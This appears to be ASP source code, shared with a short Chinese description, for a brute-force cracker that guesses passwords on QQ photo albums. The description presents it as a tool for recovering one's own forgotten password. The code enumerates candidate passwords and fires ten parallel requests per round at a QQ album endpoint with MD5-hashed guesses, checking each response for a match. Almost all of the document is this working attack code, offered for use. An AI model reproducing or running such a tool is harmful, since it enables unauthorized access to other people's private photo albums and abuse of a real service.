忘qq相册密码(又忘 qq密码了),请用本qq相册密码暴破器(第二版) <%
start_wei_shuo=1
end_wei_shuo=12
'密码字典
'大写一般没人用 ch="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@!~^#%$&"
ch=split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")
ch2=split("0,1,2,3,4,5,6,7,8,9",",")
ch3=split("a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z",",")
'--------------------------------------------------
if request("fun")="" then
%>
<%
response.end
end if
'----------------------------------------------
sub next_char_index()
aaa=0
for i=1 to session("pwd_now_len")
if session(cstr(i)&"wei_now_char_index")=(session(cstr(i)&"wei_max_index")-1) then
session(cstr(i)&"wei_now_char_index")=0
if i=cint(session("pwd_now_len")) then
if i>=cint(session("pwd_max_len")) then
session("ok_break")=1
session("pwd_now_len")=session("pwd_min_len")
for iiu=1 to 90
session(cstr(iiu)&"wei_now_char_index")=0
next
exit for
end if
session("pwd_now_len")=session("pwd_now_len")+1
session(cstr(session("pwd_now_len"))&"wei_now_char_index")=0
exit for
else
aaa=1
end if
else
session(cstr(i)&"wei_now_char_index")=session(cstr(i)&"wei_now_char_index")+1
exit for
end if
if aaa=0 then exit for
if aaa=1 then aaa=0
next
end sub
'----------------------------------------------
function get_now_pwd()
s=""
for ia=session("pwd_now_len") to 1 step -1
if session(cstr(ia)&"wei_type")="numandstr" then
a=ch(session(cstr(ia)&"wei_now_char_index"))
s=s&a
end if
if session(cstr(ia)&"wei_type")="num" then
a=ch2(session(cstr(ia)&"wei_now_char_index"))
s=s&a
end if
if session(cstr(ia)&"wei_type")="str" then
a=ch3(session(cstr(ia)&"wei_now_char_index"))
s=s&a
end if
next
get_now_pwd=s
exit function
end function
'----------------------------------------------
'main_code---start:
xml_thread_max=10
if session("haved")<>"" then
for w=1 to xml_thread_max
Execute("Set http"&cstr(w)&"=Server.CreateObject(""Microsoft.XMLHTTP"")")
Execute("http" &cstr(w) & ".Open ""GET""," & " ""http://qz-photo.qq.com/cgi-bin/qzone/cgi_qzone_view_album?uin=" &session("qq")& "&albumid=" &session("ceid")& "&password=" &request("md"&cstr(w))&" "" " &",False")
Execute("http" &cstr(w) & ".send")
Execute("Set Doc" &cstr(w) & "=Server.CreateObject(""Microsoft.XMLDOM"") ")
Execute("Doc" &cstr(w) & ".Async=False ")
Execute("Doc" &cstr(w) & ".ValidateOnParse=False")
Execute("Doc" &cstr(w) & ".Load(http" &cstr(w) & ".ResponseXML)")
Execute("set root" &cstr(w) & "=Doc" &cstr(w) & ".documentElement")
Execute("set nodelis" &cstr(w) & "=root" &cstr(w) & ".selectnodes(""msg"")")
Execute("nodecount" &cstr(w) & "=nodelis" &cstr(w) & ".length")
next
for ww=1 to xml_thread_max
if eval("nodecount" &cstr(ww) &"=0") then
response.write ""
response.end
end if
next
if session("ok_break")=1 then
response.write ""
response.end
end if
end if
session("haved")="1"
%>
<%
for io=1 to 5
response.write "
正在尝试密码:"&request("mima"&cstr(io))&" ------对应md5:"&request("md"&cstr(io))&""
next
response.write "
正在破的qq为"&session("qq")&"
正在破的qq相册的id为"&session("ceid")
response.write "
线程数:"
response.write xml_thread_max
response.write "
说明:忘qq相册密码(又忘qq密码了),请用本qq相册密码暴破器(第二版)"
response.write "
HACKER"
response.write "
返回并重新选其他破解方式"
%>
以上是暴力破解QQ相册的ASP程序源码。自己研究一下吧,破解MD5的。